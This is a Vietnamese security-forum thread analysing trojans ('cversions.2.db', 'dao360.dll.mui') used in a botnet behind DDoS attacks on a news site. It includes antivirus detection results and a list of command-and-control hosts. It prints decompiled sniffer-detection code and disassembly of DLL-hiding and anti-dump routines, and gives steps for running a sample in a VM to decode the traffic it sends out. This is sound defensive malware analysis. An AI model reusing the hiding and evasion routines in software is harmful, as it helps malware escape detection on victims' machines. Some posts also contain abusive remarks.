Các bản AV free mà bà con ta thường dùng còn MS Essentials, AVG và Avast. Mong bà con tiếp tục submit mẫu QTTask.zip cho các AntiVirus bà con đang dùng ! Bà con có thể theo list này để submit mẫu: http://www.mywot.com/wiki/Malware_submission

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Sophos thông báo kết quả analysis QTTask: QTTask.dll -- clean QTTask.exe -- clean rdpuser.mof -- clean rfc2616.exe -- identity created/updated (New detection Troj/Agent-TOZ) rwoqv.exe -- identity created/updated (New detection Troj/Agent-TPA)

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Microsoft thông báo kết quả QTTask.exe: File Detection Status Alert Level 00591716EE0B2D17A7620C65D8773C65F4DFAD68 Trojan:Win32/Horsum.A Severe E7F8258F22B7210DCA785D1040970097AAFC542C Trojan:Win32/Horsum.A Severe 7194E514AD58AE4BE6233CE1F00C8FF5EE29DCBE Trojan:Win32/Horsum.A Severe 7649A82681D9B8E2B656286F13BDD7E84537F005 Trojan:Win32/Horsum.A Severe 684EEF9918E11E648BF617FAF2A764AE42CEB433 Trojan:Win32/Temvekil.B Severe Cả 5 files đều được xem là "severe".

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

AVG vừa thông báo kết quả QTTask.exe: Files ".\QTTask.dll" ".\QTTask.exe" ".\rdpuser.mof" ".\rfc2616.exe" ".\rwoqv.exe" are new trojans and will be detected in one of the next virus definitions updates.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

Lừa đảo trắng trợn. Không nhân cách của con người.... http://www.baomoi.com/Home/CNTT/ictpress.vn/Thanh-lap-ban-ho-tro-ung-cuu-VietNamNet/7083779.epi

Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 — GMT

TMDTHBC wrote:

Lừa đảo trắng trợn. Không nhân cách của con người.... http://www.baomoi.com/Home/CNTT/ictpress.vn/Thanh-lap-ban-ho-tro-ung-cuu-VietNamNet/7083779.epi

Ý bạn đang nói về stl đấy à? Đọc bài trong link bạn gửi xong mình thấy ngạc nhiên là với vncert và các cơ quan chức năng tham gia ứng cứu sao vẫn khó khăn vậy?

Phân tích tính chất vài trận DDoS HVA vừa qua.

dietTC999 — GMT

Mình hôm nay vào Vietnamnet mãi không được. có phải là vẫn bị ddos không nhỉ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

weasel1026789 wrote:

TMDTHBC wrote:

Lừa đảo trắng trợn. Không nhân cách của con người.... http://www.baomoi.com/Home/CNTT/ictpress.vn/Thanh-lap-ban-ho-tro-ung-cuu-VietNamNet/7083779.epi
Ý bạn đang nói về stl đấy à? Đọc bài trong link bạn gửi xong mình thấy ngạc nhiên là với vncert và các cơ quan chức năng tham gia ứng cứu sao vẫn khó khăn vậy?

Mỉnh theo forum của HVA lâu lắm rồi, học hỏi mọi người khá nhiều ... Nhưng mình không nghĩ ... "trắng trợn và thô bỉ" đến thế. CMC thì có bolzano đại diện ........ còn mấy cu vớ vẩn ... thế mà cũng tự hào đưa lên "báo". @ TQN: công và sức của a mọi người biết nhưng mình không dằn đc lòng khi thấy điều vớ vẩn đó. TQN có khi nào a nghĩ chơi trò "gậy ông đập lưng ông". Mình hiểu chỉ là đam mê nhưng phải lịch sự tí, còn vớ vẩn kiểu này thì .... :-( cho chết luôn đi. Một thằng chết thì cả làng cảnh giác và quan tâm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

Em vừa đọc cái bài báo đó song, em đảm bảo là thằng tác giả viết bài báo đó có vào theo dõi HVA rất lâu rồi, dư mà lúc nó viết thì ko thèm đả động gì cả, nói thật mấy thằng mõ đó nhục thật Mấy thằng mõ thì muôn đời vẫn mãi là mõ thôi mà Theo em thì mặc kệ vietnamnet bị uýnh, cho nó chết luôn cho song, chúng nó nhờ mấy cơ quan chức năng mà lúc nào cũng miệng kêu to hơn là khả năng thì mặc kệ chúng nó, ko hiểu mấy thằng đó làm gì mà cả tháng nay vẫn ko thể nào vào được website

Phân tích tính chất vài trận DDoS HVA vừa qua.

Bướm Đêm — GMT

Oops! Down toàn tập :D tuanvietnam còn le lói http :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

vikjava — GMT

TMDTHBC wrote:

@ TQN: công và sức của a mọi người biết nhưng mình không dằn đc lòng khi thấy điều vớ vẩn đó. TQN có khi nào a nghĩ chơi trò "gậy ông đập lưng ông". Mình hiểu chỉ là đam mê nhưng phải lịch sự tí, còn vớ vẩn kiểu này thì .... :-( cho chết luôn đi. Một thằng chết thì cả làng cảnh giác và quan tâm.

Mình nghĩ anh TQN và các bác trong HVA "phân tích" malware stl không phải để đươc công nhận này nọ. Quan trọng là sự "sạch sẽ" của hệ thống mạng còn non trẻ ở VN. Tại CMC, VnCert, FPT ... đều có những thành viên gạo cội của HVA công tác ở những vị trí quan trọng. Có thể báo chí không đề cập đến nhưng những người làm kỹ thuật chân chính tại các đơn vị trên vẫn luôn theo dõi rút tỉa kinh nghiệm từ HVA, họ cảm thấy HVA có chất lượng, có ích lợi cho cộng đồng là ok rồi :) Có lẽ khi nào HVA trở thành 1 tổ chức hoặc một nhóm bảo mật có "danh chính ngôn thuận" tại VN thì trên các báo sẽ đề cập đến :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

Vanxuanemp — GMT

TQN wrote:

Ngày hôm qua em gặp mẫu của thằng Nga, dùng RPC để lây lan, em thiệt bó tay, té xỉu luôn ! Chả hiểu nó viết cái gì, vì về code nó đã là thằng coder cao tay hơn mình rồi ! Sau cùng, phải nhờ anh Gấu gồ, anh ấy chỉ ra là nó khai thác lổi của Print Spooler.

Đề nghị TQN cung cấp thông tin về con khai thác cái Print Spooler này giúp với, hiện tại đang bị cái lỗi chắc là từ con này, mà ghost lại máy, cài lại win vẫn bị dính. Tks.

Phân tích tính chất vài trận DDoS HVA vừa qua.

phuongnvt — GMT

vikjava wrote:

TMDTHBC wrote:

@ TQN: công và sức của a mọi người biết nhưng mình không dằn đc lòng khi thấy điều vớ vẩn đó. TQN có khi nào a nghĩ chơi trò "gậy ông đập lưng ông". Mình hiểu chỉ là đam mê nhưng phải lịch sự tí, còn vớ vẩn kiểu này thì .... :-( cho chết luôn đi. Một thằng chết thì cả làng cảnh giác và quan tâm.
Mình nghĩ anh TQN và các bác trong HVA "phân tích" malware stl không phải để đươc công nhận này nọ. Quan trọng là sự "sạch sẽ" của hệ thống mạng còn non trẻ ở VN. Tại CMC, VnCert, FPT ... đều có những thành viên gạo cội của HVA công tác ở những vị trí quan trọng. Có thể báo chí không đề cập đến nhưng những người làm kỹ thuật chân chính tại các đơn vị trên vẫn luôn theo dõi rút tỉa kinh nghiệm từ HVA, họ cảm thấy HVA có chất lượng, có ích lợi cho cộng đồng là ok rồi :) Có lẽ khi nào HVA trở thành 1 tổ chức hoặc một nhóm bảo mật có "danh chính ngôn thuận" tại VN thì trên các báo sẽ đề cập đến :D

Theo anh em, Con đường nào cho HVA để trở thành "danh chính ngôn thuận" ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

whitesnow19 — GMT

Nếu các bạn để ý thì thấy vietnamnet.vn sau khi type sẽ được wwwect đến một trang chứa script để vào trang chủ. Nhưng em biết trong số các viewer đang xem bài viết nào có "trojan" stl. không biết em nên post lên đây url đó không? Đã pm riêng anh conmale url này tuỳ anh xử lý.

Phân tích tính chất vài trận DDoS HVA vừa qua.

quygia128 — GMT

Đúng là đọc bài báo bức xúc không chịu được. Nếu anh TQN không phân tích và up mẫu cho các AV thì em nghĩ giờ này VNN chẳng vào được nữa chứ đừng nói là chậm, ý là đã diệt được 1 số lượng lớn malware của stl mà báo VNN bây giờ muốn vào cũng khó khăn. Chỉ thấy buồn. Đưa vào bài báo bốn năm cái trung tâm bảo mật lớn như thế, xây dựng cả 1 ban ứng cứu mà lại phán 1 câu là không là đang tìm phương án khác. Ngay bản thân họ là người bị tấn công mà cũng không biết đường khắc phục, không thể phân tích và vạch trần mạng bootnet này, em chỉ thấy lạ ở điểm này.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Các bạn đừng bức xúc làm gì. Hãy nghĩ rằng vietnamnet cũng như các tờ báo khác có nỗi khổ hoặc giới hạn của họ. HVA từ khi chuyển hướng thành forum bảo mật chưa bao giờ có tiêu chí hoặc định hướng làm sao để nổi tiếng hoặc làm sao để có "nhiều khách". Chính vì vậy, HVA nghiêm túc trong thảo luận và nghiêm khắc trong việc điều hợp bài vở. Nói một cách khác, HVA tồn tại là vì nó mang lại được những ích lợi thiết thực cho cộng đồng chớ không phải vì tăng "rank" hoặc vì "có tiếng" một cách phù du. Những thứ "rank" hoặc "tiếng" nếu có thì cũng sẽ tàn nếu như không duy trì được chất lượng sinh hoạt. Riêng việc HVA làm được gì với tình trạng đánh phá phi pháp trong thời gian qua, chính cộng đồng và từng cá nhân trong cộng động cảm nhận và chia xẻ. Đó mới là điều quan trọng và đáng quý. Cho dù có được "lên báo" một cách khiêng cưỡng hay không đúng sự thật thì cũng chẳng có mấy giá trị. HVA làm đúng hay làm sai, thời gian sẽ trả lời. Trước mắt, nếu các bạn nghĩ rằng việc tung trojans để đánh cắp thông tin cá nhân, để "bạch hoá", để tạo botnets và để sử dụng máy tính của nạn nhân một cách phi pháp là những việc làm tồi bại và nên được ngăn chặn, hãy theo dõi máy của mình và cung cấp mẫu mã để HVA tiếp tục phân tích và gởi thông báo đến các AV để họ kịp thời phổ biến những bản cập nhật cần thiết giúp cho các nạn nhân không vô tình bị biến thành các zombies cho những mục đích xấu xa.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tiếp tục nhờ bà con kiểm tra, check, report baduse, badsite các host mang trong bụng của thằng Dao360.dll.mui hồi xưa: Code:

Host                            IP                  Hosted
=====                           ==                  =======
educationuk.ath.cx              111.90.150.183      PIRADIUS NET, Malaysia
goldenftpserver.ftpaccess.cc    188.72.216.63       Santrex Internet Service, Germany
hackforums.blogdns.net          209.217.248.77      Landis Holdings Inc, USA - Texas
playgirl.mypets.ws              188.72.216.63       Santrex Internet Service, Germany
searchsecurity.selfip.info      111.90.150.183      PIRADIUS NET, Malaysia

Phân tích tính chất vài trận DDoS HVA vừa qua.

piloveyou — GMT

TQN wrote:

Các bản AV free mà bà con ta thường dùng còn MS Essentials, AVG và Avast. Mong bà con tiếp tục submit mẫu QTTask.zip cho các AntiVirus bà con đang dùng ! Bà con có thể theo list này để submit mẫu: http://www.mywot.com/wiki/Malware_submission

Cái này được đó bác lên đó sưu tập ok đó.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Ngày hôm qua, sau khi em phân tích xong cversions.2.db, em dùng PatchDiff compare với IDA database của dao360.dll.mui, hai version mà em đã có. Phải nói là như anh chị em sinh đôi, giống nhau tới từng hàm, thứ tự hàm, thứ tự call. Chỉ khác nhau cái list mấy cái host để upload thông tin victim về, cách mã hoá, che giấu.... Nói chung là: chỉ là một code base ban đầu thôi. Và em cũng thành thật xin lỗi anh em, cái tội hồ đồ, bộp chộp. Từ năm 2010, trong code của Dao360.dll.mui đã có code detect SmartSniff rồi. Chỉ khác là lúc đó detect trên WndClassName, còn cversions.2.db là WndName. Cờ thì đổi lại, TRUE->FALSE, tức là cái g_bNotSafeToConnect nguyên thuỷ là g_bSafeToConnect, vậy thôi. Giống nhau tới từng dòng if, while, for.... Điều này chứng tỏ gì vậy bà con, stl cạn kiệt mẫu và source "mèo què" rồi. Có bao nhiêu đó, chế đi chế lại, thêm mắm thêm muối, bớt đường, bột ngọt thôi =)) (RCE hoài, ngán quá !) Bà con nhìn 2 cái list của mấy cái host của cversions.2.db và dao360.dll.mui, thấy không quan trọng, không quan tâm, không dính dáng gì tới mình. Lầm chết đấy, cái nguy hiểm nhất của tụi stl này là mấy cái host đó đấy. Bao nhiêu thông tin của "đã, đang, và sẽ" (tùm lum thì luôn, quá khứ, hiện tại, tương lai...) của các victim sẽ được up về đó đấy. Stl group sẽ dựa các thông tin trên các host đó mà muốn "bạch hoá" hay "tắm trắng" ai, hoàn toàn nằm trên các host đó đấy. Bao nhiêu cái host đó đủ để stl group hoành hoành giang hồ Internet, khủng bố, đánh phá, hù doạ, khống chế mấy năm nay ! Em nói đúng không mấy "đại ca" stl ? Em tự hỏi giờ trong 11 cái host đó, có cái nào còn lưu thông tin của "Thằng Cu Anh" này không ? Và bà con, anh em IT VN ta, hảy đặt trường hợp, tất tần tật thông tin của mình, của máy tính mình đang dùng, đều nắm trên 11 cái host đó, thì sao ? Anh em hảy tự hỏi mình và tự hành động đi! Muốn stl "tắm trắng" anh em không ? Nằm trên đó hết đấy ? ! Tới bây giờ, anh em HVA sẽ "tắm đen" lại mấy anh, locked mấy cái host đó, thì mấy anh stl sẽ thấy, "cao nhân tất hữu cao nhân trị", "núi này cao còn có núi khác cao hơn". Các anh em HVA, chỉ dám nhận mình là "lùn tịt nhân", là cái gò, cái ụ mối thấp lè tè thôi, đủ để mấy anh gặp nightmare rồi, còn bao nhiêu núi cao khác, đồi cao khác chưa ra mặt... mà nhảy vô, thì mấy anh chỉ dẹp tiệm luôn là vừa, nhớ nhé ! Sau khi các AVs cập nhật hết, các host trên bị locked hết, thử xem các anh còn "tắm trắng" ai được nữa, còn hù doạ, khủng bố, lên mặt với ai được nữa không ? Em có lang thang trên các blog, forum, nghe đệ tử mấy anh hùng hồn tuyên bố, sẽ ra ver mới của "mèo què"'s stl, sẽ đập chết mấy ai chống đối mấy anh ! Ráng đợi cái ver mới đó, xem thử mấy anh có đủ sức quay mấy anh em HVA và RCE team của HVA này hay không ? Nói nhỏ nhé, còn khuya, mấy anh muốn code cái gì thì ai cũng đã biết từ lâu rồi, không qua nổi những kiến thức, tips, tricks, techniques đã phổ biến trên Internet đâu, vì coder của mấy anh chỉ giỏi đạo code, đạo ý tưởng thôi mà, phải không mấy anh stl ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

learningandlearning — GMT

Dạo này em thấy model mình chớp liên tục mặc dù không lên mạng. Bật Wireshark thì thấy những dòng xanh này liên tục. Không biết máy của em có vấn đề gì không?

@TQN: có cách nào dùng Wireshark mà malware stl không phát hiện được không anh?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Không sao cả bà con, code detect Wireshark của stl có bug, bug này giải thích như sau: 1. Khi Run wireshark.exe, nếu chưa start capture thì WindowName string của wireshark là: "The Wireshark Network Analyzer", lúc này hàm FindWindowW sẽ tìm ra và return TRUE, cờ global được set thành TRUE. 2. Khi ta start capture, WindowName của Wireshark sẽ thay đổi thành "Capturing from xxxx". Lúc này FindWindowW sẽ return FALSE, tìm không ra. Em vừa download bản Wireshark v1.6.2 trên http://www.wireshark.org, run và test WindowName trên Wireshark đó. Tóm lại, cuối cùng, ta chỉ cần đổi tên wireshark.exe thành tên khác, vd: wrshark.exe, thì toàn bộ đoạn code detect Wireshark của stl coder (group ?) sẽ vô dụng ! Còn để đề phòng cho các trường hợp detect khác, ngoài việc đổi tên wireshark.exe thành xxx.exe gì đó, các bạn nên dùng thêm 1 HexEditor (010 Editor chẳng hạn, bà con down tại đây http://www.exelab.ru) để find và replace Ansi string "The Wireshark Network Analyzer" thành chuổi khác, vd như em thì thay thành "The Sharkwire Analyzer Network" =)) Đoạn thread code detect sniffers của stl coder: Code:

int __stdcall Set_Privilege_And_Detect_Sniffers_Thread_Proc(LPVOID pParam)
{
    HANDLE hThread; // eax@1

    hThread = CreateThread(0, 0, EnableDebugAndShutdownPrivilege, 0, 0, 0);
    if (hThread)
        CloseHandle(hThread);

    while ( g_dwContinue )
    {
        if ( DetectWireshark() || DetectSmartSniff() || DetectEtherDPacketSniffer() )
        {
            g_bNotSafeToConnect = TRUE;
            Sleep(5000u); // ngủ 5s
        }
        else
        {
            g_bNotSafeToConnect = FALSE;
            Sleep(5000u);  // ngủ 5s
        }
    }
    return 0;
}

Cứ ngủ xong 5s, thức dậy, detecting tiếp, set cờ, lại ngủ tiếp. Bởi vậy có bà con có nói với em, sao "mèo đã què" rồi mà không cho ngủ hả anh ?! Ngủ hay không ngủ gì nó cũng ngốn và nóng CPU hết, vì đã code multithread mà cứ Sleep với loop liên tục thì bằng không ? Và không lẽ khi đang debug nó, mình phải ngủ theo nó à :-( Lại còn check đk trên global variables nữa chứ, tranh chấp hay detect sai là cái chắc (g_dwContine và g_bNotSafeToConnect). Mấy anh stl không biết dùng cơ chế Synchronize và WaitForxxx à ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

cversions.2.db và dao360.dll.mui đều là chung một code base ban đầu. Chúng có 2 hàm đáng chú ý sau mà anh em research rootkit, cracking hay gặp: 1. Hàm che dấu Dll name khỏi các tool Process Explorer, TaskManager....: Code:

.text:1000D610     ; BOOL HideDLL(void)
.text:1000D610     HideDLL proc near                       ; CODE XREF: MaintThreadProc+A9p
.text:1000D610     ldr     = dword ptr -4
.text:1000D610 000         push    ecx
.text:1000D611 004         mov     ecx, g_hinstDLL
.text:1000D617 004         test    ecx, ecx
.text:1000D619 004         jnz     short @@DLLInstanceNotZero
.text:1000D61B 004         xor     eax, eax
.text:1000D61D 004         pop     ecx
.text:1000D61E 000         retn
.text:1000D61F     @@DLLInstanceNotZero:                   ; CODE XREF: HideDLL+9j
.text:1000D61F 004         push    esi
.text:1000D620 008         mov     eax, large fs:18h       ; eax = ptr to _TEB
.text:1000D626 008         mov     eax, [eax+_TEB.ProcessEnvironmentBlock] ; eax = ptr to _PEB
.text:1000D629 008         mov     eax, [eax+_PEB.Ldr]     ; eax = ptr to _PEB_LDR_DATA
.text:1000D62C 008         mov     [esp+8+ldr], eax
.text:1000D630 008         mov     eax, [esp+8+ldr]
.text:1000D634 008         mov     esi, [eax+PEB_LDR_DATA.InLoadOrderModuleList.Flink] ; esi = InLoadOrderModuleList: _LIST_ENTRY struct
.text:1000D637 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.DllBase] ; eax = DllBase of first DLL (0x18 offset in LDR_DATA_TABLE_ENTRY struct)
.text:1000D637                                             ; In Windows, hau nhu la DllBase cua Ntdll.dll
.text:1000D63A 008         test    eax, eax
.text:1000D63C 008         jz      short @@FoundThisDLL
.text:1000D63E 008         mov     edi, edi
.text:1000D640     @@IsThisDLL:                            ; CODE XREF: HideDLL+3Bj
.text:1000D640 008         cmp     eax, ecx                ; ecx = DllBase or HInstance of this DLL
.text:1000D642 008         jz      short @@FoundThisDLL
.text:1000D644 008         mov     esi, [esi]              ; esi = InLoadOrderLinks.Flink
.text:1000D646 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.DllBase] ; eax = DllBase of next DLL
.text:1000D649 008         test    eax, eax
.text:1000D64B 008         jnz     short @@IsThisDLL
.text:1000D64D     @@FoundThisDLL:                         ; CODE XREF: HideDLL+2Cj
.text:1000D64D                                             ; HideDLL+32j
.text:1000D64D 008         cmp     [esi+_LDR_DATA_TABLE_ENTRY.DllBase], 0 ; DllBase is 0 ?
.text:1000D651 008         jnz     short @@ModifyDoubleLinkList
.text:1000D653 008         xor     eax, eax
.text:1000D655 008         pop     esi
.text:1000D656 004         pop     ecx
.text:1000D657 000         retn
.text:1000D658     @@ModifyDoubleLinkList:                 ; CODE XREF: HideDLL+41j
.text:1000D658 008         mov     ecx, [esi+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Blink]
.text:1000D65B 008         mov     edx, [esi+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink]
.text:1000D65D 008         mov     [ecx+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink], edx
.text:1000D65F 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink]
.text:1000D661 008         mov     ecx, [esi+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Blink]
.text:1000D664 008         mov     [eax+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Blink], ecx
.text:1000D667 008         mov     edx, [esi+_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Blink]
.text:1000D66A 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Flink]
.text:1000D66D 008         mov     [edx+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink], eax
.text:1000D66F 008         mov     ecx, [esi+_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Flink]
.text:1000D672 008         mov     edx, [esi+_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Blink]
.text:1000D675 008         mov     [ecx+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Blink], edx
.text:1000D678 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.InInitializationOrderLinks.Blink]
.text:1000D67B 008         mov     ecx, [esi+_LDR_DATA_TABLE_ENTRY.InInitializationOrderLinks.Flink]
.text:1000D67E 008         mov     [eax+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink], ecx
.text:1000D680 008         mov     edx, [esi+_LDR_DATA_TABLE_ENTRY.InInitializationOrderLinks.Flink]
.text:1000D683 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.InInitializationOrderLinks.Blink]
.text:1000D686 008         mov     [edx+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Blink], eax
.text:1000D689 008         mov     ecx, [esi+_LDR_DATA_TABLE_ENTRY.HashLinks.Blink]
.text:1000D68C 008         mov     edx, [esi+_LDR_DATA_TABLE_ENTRY.HashLinks.Flink]
.text:1000D68F 008         mov     [ecx+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink], edx
.text:1000D691 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.HashLinks.Flink]
.text:1000D694 008         mov     ecx, [esi+_LDR_DATA_TABLE_ENTRY.HashLinks.Blink]
.text:1000D697 008         mov     [eax+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Blink], ecx
.text:1000D69A 008         movzx   edx, [esi+_LDR_DATA_TABLE_ENTRY.FullDllName.Length]
.text:1000D69E 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.FullDllName.Buffer]
.text:1000D6A1 008         push    edx                     ; size_t
.text:1000D6A2 00C         push    0                       ; int
.text:1000D6A4 010         push    eax                     ; void *
.text:1000D6A5 014         call    _memset                 ; Zero the FullDllName
.text:1000D6AA 014         push    48h
.text:1000D6AC 018         push    0
.text:1000D6AE 01C         push    esi
.text:1000D6AF 020         call    _memset                 ; Zero memory _LDR_DATA_TABE_ENTRY of this DLL
.text:1000D6B4 020         add     esp, 18h
.text:1000D6B7 008         mov     eax, 1
.text:1000D6BC 008         pop     esi
.text:1000D6BD 004         pop     ecx
.text:1000D6BE 000         retn
.text:1000D6BE     HideDLL endp

Sau khi hàm HideDll này được thực thi, với các tool bình thường, chúng ta sẽ không thấy cversions.2.db hay dao360.dll.mui được load lên. 2. Code anti-dump dll memory xuống disk: Code:

.text:1000DF80     ; void __cdecl IncSizeOfImageFieldInLDR()
.text:1000DF80     IncSizeOfImageFieldInLDR proc near      ; CODE XREF: MaintThreadProc:loc_1000A82Ep
.text:1000DF80 000         mov     eax, large fs:30h       ; eax = PEB
.text:1000DF86 000         mov     eax, dword ptr [eax+_PEB_LDR_DATA.InLoadOrderModuleList] ; eax = Ldr: _PEB_LDR_DATA
.text:1000DF89 000         mov     eax, [eax+_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Blink] ; InLoadOrderModuleList : _LIST_ENTRY
.text:1000DF8C 000         add     [eax+_LDR_DATA_TABLE_ENTRY.SizeOfImage], 3686400 ; _LDR_DATA_TABLE_ENTRY: 0x20 offset = SizeOfImage
.text:1000DF93 000         retn
.text:1000DF93     IncSizeOfImageFieldInLDR endp

Hai kỹ thuật trên đã có từ lâu lắm rồi, được public nhiều trên Phrack magazine và Vxnetlux...., nói chung là đạo code, không có gì mới, nhưng vẫn hiệu quả với các tool, người dùng bình thường trong việc che giấu cversions.2.db hay dao360.dll.mui khỏi TaskManager, ListDll, Process Explorer....

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Còn một cách khác để chúng ta có thể run Wireshark, SmartSniff..., không cấn modify wireshark.exe, smsniff.exe... mà code của stl sẽ không thể nào detect ra. Chúng ta sẽ dùng tool HideToolZ, tool này nhiều bạn biết. Các bạn có thể download ở đây: http://woodmann.com/collaborative/tools/index.php/HideToolz. Có thể sẽ có vài AVs báo HideToolz là rootkit, không sao ! Chỉnh option của HideToolz như hình:

Run Wireshark hay SmartSniff, hide các process đó, xong. Code của stl sẽ không detect ra ! Tiếp tục nào các bạn, vì cversions.2.db là một dll, nên chúng ta không thể nào run nó trực tiếp được. Chúng ta chép một mình cversions.2.db qua máy ảo (VM), vào thư mục C:\Temp chẵng hạn. Run Wireshark (hay SmartSniff) trên máy ảo với protect = HideToolz như trên. Config Wireshark để capture vào một pcap file nào đó, rồi start capture. Sau đó ra ngoài command line, gõ lệnh: Code:

rundll32.exe C:\Temp\cversions.2.db, ABCDE

Do cversions.2.db không export hàm nào, nên rundll32.exe sẽ quăng ra môt message box, kệ nó, đừng click OK, bỏ đó đi uống ăn cơm. Các thread của cversions.2.db đã bắt đầu chạy rồi đó, Wireshark sẽ capture sau khi các thread đó ngủ dậy. Quan sát Wireshark tới khi nào các bạn thấy cversions.2.db kết nối tới các host kia. Click OK để kết thúc rundll32.exe (sẽ tự kill luôn cversions.2.db). Mở file pcap thu được bằng Wireshark với 010 Editor, mở template PCAPTemplate.bt, xor data gởi đi với 0x1D, các bạn sẽ thấy cversions.2.db đã gởi đi thứ gì từ mấy các bạn.

Một phần data trên máy em sau khi em xor:

Bà con chú ý cái hình after xor nhé, dòng bôi đõ đầu tiên là volume serial number của C: (%HomeDrive%), dòng bôi đỏ thứ hai là MAC address của card mạng, dòng bôi đỏ thứ 3 là Model và Serial Number của Hard Disk1 (master). Bà con ai biết, chữ "Bai" là gì, của ngôn ngữ nào không ??? Chữ "Bai" này em thấy lạ lắm, vì em biết coder Việt ta không bao giờ dùng chữ "Bai" để mô tả harddisk type và serial number ???

Trong khi đó, với dao360.dll.mui thì code lấy harddisk type và serialnumber không có (chưa dùng WMI), nên chuỗi format chỉ là: Code:

[%d.%d.%d] - SP %d - PT %d - SM %d - HD %0.8X - NIC %s

Phân tích tính chất vài trận DDoS HVA vừa qua.

trycatch — GMT

TQN wrote:

Bà con ai biết, chữ "Bai" là gì, của ngôn ngữ nào không ??? Chữ "Bai" này em thấy lạ lắm, vì em biết coder Việt ta không bao giờ dùng chữ "Bai" để mô tả harddisk type và serial number ???

Tiếng Việt không dấu dịch ra là: Bài, Bái, Bại, Bải Tàu dịch ra là 100 Anh dịch ra là : tạm biệt anh TQN, :P

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

Cái từ Bai mà a TQN nhắc tới nếu dịch = google translate nó ra mấy nghĩa: 1. WHITE (白) 2. 100 (百) 3. Worship (拜) .... =)) nói chung nghi ngờ KHỰA hơi nhiều nên chỉ tập trung vào đó. Sorry bạn KHỰA nếu mình sai =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

2 trycatch: Bai # Bye nhen ! String sau từ "Bai" là kết hợp của 2 string này:

Vì vậy, các bạn search hay Google Translate từ "Bai" đó sai hết rồi, hì hì ;) Với các bạn đã code C/C++, nhìn hàm format string đó các bạn hiểu ngay là: Code:

[%d.%d.%d]: [dwMajorVersion.dwMinorVersion.dwBuildNumber]
SP: wServicePackMajor
PT: wProductType
SM: wSuiteMask
HD: Volume serial number of %HomeDrive%
NIC: MAC address
Bai: ???????

Và các bạn còn nhớ cái name pipe tên Nanned không trong bộ Dao360.dll.mui ? PS: Đoạn code HideDll của stl coder có bug, nên nó không hide được cversions.2.db hay dao360.dll.mui trong list DLLs panel view của Process Explorer hay Process Hacker... Em đố bạn nào tìm ra được bug đó, nếu tìm ra, CN này đi nhậu ;) Bữa nhậu này đáng lý phải bắt stl coder trả tiền, cho chừa cái tội copy code mà không hiểu, không test -:-) Các bạn thử đoán xem, stl coder lấy list các software, các update trên máy victim để làm gì ? Thâm hiểm lắm đấy !

Phân tích tính chất vài trận DDoS HVA vừa qua.

secmask — GMT

TQN wrote:

Và các bạn còn nhớ cái name pipe tên Nanned không trong bộ Dao360.dll.mui ? PS: Đoạn code HideDll của stl coder có bug, nên nó không hide được cversions.2.db hay dao360.dll.mui trong list DLLs panel view của Process Explorer hay Process Hacker... Em đố bạn nào tìm ra được bug đó, nếu tìm ra, CN này đi nhậu ;) Bữa nhậu này đáng lý phải bắt stl coder trả tiền, cho chừa cái tội copy code mà không hiểu, không test -:-) Các bạn thử đoán xem, stl coder lấy list các software, các update trên máy victim để làm gì ? Thâm hiểm lắm đấy !

Không thấy đả động gì đến MemoryOrder list, không lẽ bug ở đây :D, bản Process Explorer 11.x cũ của em nó không hiện cversion2.db trong list module thật.

Phân tích tính chất vài trận DDoS HVA vừa qua.

quygia128 — GMT

Các bạn thử đoán xem, stl coder lấy list các software, các update trên máy victim để làm gì ? Thâm hiểm lắm đấy !

